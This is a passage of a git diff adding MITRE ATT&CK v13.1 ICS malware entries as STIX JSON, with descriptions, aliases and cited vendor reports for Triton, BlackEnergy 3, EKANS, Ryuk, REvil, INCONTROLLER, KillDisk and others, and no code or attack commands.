+ "url": "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4"
+ },
+ {
+ "source_name": "LogRhythm WannaCry",
+ "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.",
+ "url": "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/"
+ },
+ {
+ "source_name": "US-CERT WannaCry 2017",
+ "description": "US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA17-132A"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--80099a91-4c86-4bea-9ccb-dac55d61960e.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--80099a91-4c86-4bea-9ccb-dac55d61960e.json
new file mode 100644
index 0000000000000000000000000000000000000000..632cbc9d91db8dd74de2805710ada15ef3522c30
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--80099a91-4c86-4bea-9ccb-dac55d61960e.json
@@ -0,0 +1,77 @@
+{
+ "type": "bundle",
+ "id": "bundle--721ebd06-b632-4fe2-904f-395830502d99",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-11-23T14:27:54.711Z",
+ "name": "Triton",
+ "description": "[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Triton",
+ "TRISIS",
+ "HatMan"
+ ],
+ "type": "malware",
+ "id": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e",
+ "created": "2019-03-26T15:02:14.907Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S1009",
+ "external_id": "S1009"
+ },
+ {
+ "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017",
+ "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ",
+ "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
+ },
+ {
+ "source_name": "DHS CISA February 2019",
+ "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ",
+ "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf"
+ },
+ {
+ "source_name": "Dragos December 2017",
+ "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ",
+ "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf"
+ },
+ {
+ "source_name": "Jos Wetzels January 2018",
+ "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ",
+ "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware"
+ },
+ {
+ "source_name": "Julian Gutmanis March 2019",
+ "description": "Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11 ",
+ "url": "https://www.youtube.com/watch?v=XwSJ8hloGvY"
+ },
+ {
+ "source_name": "Schneider December 2018",
+ "description": "Schneider 2018, December 14 Security Notification EcoStruxure Triconex Tricon V3 Retrieved. 2019/03/08 ",
+ "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01"
+ },
+ {
+ "source_name": "Schneider Electric January 2018",
+ "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ",
+ "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.0.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b.json
new file mode 100644
index 0000000000000000000000000000000000000000..d547db3907a19b3e1b5400a1834af47d869c0342
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b.json
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9ca9b74d-5977-4d2a-9343-ac25efa69a0d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "BlackEnergy 3" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "BlackEnergy 3", + "description": "[BlackEnergy 3](https://collaborate.mitre.org/attackics/index.php/Software/S0004) is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid. (Citation: Booz Allen Hamilton)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-04-29T14:49:39.188Z", + "external_references": [ + { + "external_id": "S1002", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0004" + }, + { + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.", + "source_name": "Booz Allen Hamilton", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f.json new file mode 100644 index 0000000000000000000000000000000000000000..85653b615a0eb79e5a9401ad7ef54bc631fdd532 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f.json 
@@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--5b7fce69-aba4-4114-8305-b96998b2f4e9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_version": "1.0", + "type": "malware", + "modified": "2021-10-21T14:00:00.188Z", + "created": "2021-04-13T12:28:31.188Z", + "description": "[EKANS](https://collaborate.mitre.org/attackics/index.php/Software/S0017) is ransomware that was first seen December 2019 and later reported to have impacted operations at Honda automotive production facilities.(Citation: Forbes Snake Ransomware June 2020)(Citation: MalwareByes Honda and Enel Ransomware June 2020)(Citation: Dragos EKANS February 2020) EKANS has a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy historian, Honeywell HMIWeb).(Citation: Dragos EKANS February 2020) If the malware discovers these processes on the target system, it will stop, encrypt, and rename the process to prevent the program from restarting. This malware should not be confused with the \u201cSnake\u201d malware associated with the Turla group. 
The ICS processes documented within the malware\u2019s kill-list is similar to those defined by the MEGACORTEX software.(Citation: FireEye OT Ransomware July 2020)(Citation: Pylos January 2020)(Citation: Dragos EKANS June 2020)The ransomware was initially reported as \u201cSnake\u201d, however, to avoid confusion with the unrelated Turla APT group security researchers spelled it backwards as EKANS.", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S0017", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0017" + }, + { + "source_name": "Forbes Snake Ransomware June 2020", + "description": "Davey Winder. (2020, June 10). Honda Hacked: Japanese Car Giant Confirms Cyber Attack On Global Operations. Retrieved April 12, 2021.", + "url": "https://www.forbes.com/sites/daveywinder/2020/06/10/honda-hacked-japanese-car-giant-confirms-cyber-attack-on-global-operations-snake-ransomware/?sh=2725c35753ad" + }, + { + "source_name": "MalwareByes Honda and Enel Ransomware June 2020", + "description": "MalwareBytes. (2020, June 09). Honda and Enel impacted by cyber attack suspected to be ransomware. Retrieved April 12, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/" + }, + { + "source_name": "Dragos EKANS February 2020", + "description": "Dragos Threat Intelligence. (2020, February 03). EKANS Ransomware and ICS Operations. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "FireEye OT Ransomware July 2020", + "description": "Nathan Brubaker, Daniel Kapellmann Zafra, Keith Lunden, Ken Proska, Corey Hildebrandt. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. 
Retrieved April 12, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html" + }, + { + "source_name": "Pylos January 2020", + "description": "Joe Slowik. (2020, January 28). Getting the Story Right, and Why It Matters. Retrieved April 12, 2021.", + "url": "https://pylos.co/2020/01/28/getting-the-story-right-and-why-it-matters/" + }, + { + "source_name": "Dragos EKANS June 2020", + "description": "Joe Slowik. (2020, June 18). EKANS Ransomware Misconceptions and Misunderstandings. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/#_edn7" + } + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f", + "name": "EKANS", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--a020a61c-423f-4195-8c46-ba1d21abba37.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a020a61c-423f-4195-8c46-ba1d21abba37.json new file mode 100644 index 0000000000000000000000000000000000000000..1bd8105d8b5d7a88c83ce30daa39c30cfda649c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a020a61c-423f-4195-8c46-ba1d21abba37.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--837242f4-62b8-4a41-9f21-2f57aecea834", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_contributors": [ + "The DFIR Report, @TheDFIRReport", + "Matt Brenton, Zurich Insurance Group" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created": "2020-05-13T20:14:53.171Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0446", + "url": "https://attack.mitre.org/software/S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021." + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." 
+ }, + { + "source_name": "FireEye FIN6 Apr 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "modified": "2022-05-24T21:10:44.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ryuk", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--a4a98eab-b691-45d9-8c48-869ef8fefd57.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a4a98eab-b691-45d9-8c48-869ef8fefd57.json new file mode 100644 index 0000000000000000000000000000000000000000..3a287cbf891f1fe185095c812b46f52d9683ac6a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a4a98eab-b691-45d9-8c48-869ef8fefd57.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--6a3280e9-d3ac-4ad3-a1af-8dad84d433fd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:15:44.068Z", + "name": "ACAD/Medre.A", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) is a worm that steals operational information. The worm collects AutoCAD files with drawings. [ACAD/Medre.A](https://attack.mitre.org/software/S1000) has the capability to be used for industrial espionage.(Citation: ESET)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "ACAD/Medre.A" + ], + "type": "malware", + "id": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1000", + "external_id": "S1000" + }, + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5.json new file mode 100644 index 0000000000000000000000000000000000000000..2871cf2af402ce8e6a7d70a979eb969a979dd8f0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5.json 
@@ -0,0 +1,117 @@ +{ + "type": "bundle", + "id": "bundle--b292fc1d-b73c-4699-93df-13f31a2c4f6a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T20:06:33.317Z", + "name": "REvil", + "description": "[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "REvil", + "Sodin", + "Sodinokibi" + ], + "type": "malware", + "id": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "created": "2020-08-04T15:06:14.796Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0496", + "external_id": "S0496" + }, + { + "source_name": "Sodin", + "description": "(Citation: Intel 471 REvil March 2020)(Citation: Kaspersky Sodin July 2019)" + }, + { + "source_name": "Sodinokibi", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee REvil 
October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)" + }, + { + "source_name": "Talos Sodinokibi April 2019", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html" + }, + { + "source_name": "Group IB Ransomware May 2020", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020.", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html" + }, + { + "source_name": "G Data Sodinokibi June 2019", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data" + }, + { + "source_name": "Intel 471 REvil March 2020", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.", + "url": "https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/" + }, + { + "source_name": "Kaspersky Sodin July 2019", + "description": "Mamedov, O, et al. 
(2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.", + "url": "https://securelist.com/sodin-ransomware/91473/" + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" + }, + { + "source_name": "Picus Sodinokibi January 2020", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware" + }, + { + "source_name": "McAfee REvil October 2019", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 Crescendo. Retrieved August 5, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Tetra Defense Sodinokibi March 2020", + "description": "Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. 
Retrieved December 14, 2020.", + "url": "https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b.json new file mode 100644 index 0000000000000000000000000000000000000000..e4e00978aa052a5939da8914f7b0822dc5d01f26 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b.json 
@@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--ca8d9702-4eb6-4584-b3b5-e8c7f2ad6751", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-17T16:23:24.812Z", + "name": "INCONTROLLER", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22) ", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Engineering Workstation", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Jimmy Wylie, Dragos, Inc." + ], + "x_mitre_aliases": [ + "INCONTROLLER", + "PIPEDREAM" + ], + "type": "malware", + "id": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "created": "2022-09-28T20:07:40.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1045", + "external_id": "S1045" + }, + { + "source_name": "PIPEDREAM", + "description": "(Citation: Dragos-Pipedream)(Citation: Wylie-22)" + }, + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. 
Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite\u2019s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + }, + { + "source_name": "Schneider-Incontroller", + "description": "Schneider Electric. (2022, April 14). Schneider Electric Security Bulletin: \u201cAPT Cyber Tools Targeting ICS/SCADA Devices\u201d . Retrieved September 28, 2022.", + "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2022-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6.json
new file mode 100644
index 0000000000000000000000000000000000000000..02d9029b66b046f4cb7e2625646afc673d317853
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6.json
@@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--a84ff427-8c1b-4700-bcd5-9f862a1ac096", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:13:42.357Z", + "name": "KillDisk", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "KillDisk", + "Win32/KillDisk.NBI", + "Win32/KillDisk.NBH", + "Win32/KillDisk.NBD", + "Win32/KillDisk.NBC", + "Win32/KillDisk.NBB" + ], + "type": "malware", + "id": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "created": "2021-01-20T18:05:07.059Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 